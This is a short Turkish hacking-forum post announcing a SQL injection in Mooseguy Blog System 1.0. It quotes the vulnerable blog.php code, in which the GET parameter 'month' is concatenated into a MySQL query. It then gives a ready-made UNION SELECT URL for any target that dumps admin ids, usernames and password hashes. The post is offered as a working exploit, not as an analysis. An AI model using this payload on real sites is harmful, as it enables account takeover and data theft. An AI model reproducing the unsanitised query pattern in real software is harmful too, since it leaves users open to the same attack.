THe-LaWRoS üye
Mesaj Sayısı : 31 Yaş : 34 Kayıt tarihi : 08/02/08
| Konu: Mooseguy Blog System 1.0 SQL Injection Cuma Şub. 08, 2008 10:06 pm | |
| # MGBS 1.0 Remote SQL injection # Script url http://sourceforge.net/project/showf...roup_id=193233# Vulnerable code in blog.php <?php $month = $_GET['month']; $result = mysql_query("SELECT * FROM blog WHERE posted='$month' ORDER BY id DESC") or die("HELP QUERY BROKEN"); ... # Admin hash exploit http://[target]/[path]/blog.php?month='+union+select+1,2,3,4,5,concat_ws( 0x3a,id,uname,upass),7,8+from+users/* # Bug discovered by The_HuliGun | |
|
Blué-kinq |administratör|
Mesaj Sayısı : 229 Yaş : 35 Nerden : Antalya İş/Hobiler : hacker Lakap : Blué-Kinq Kayıt tarihi : 07/02/08
| |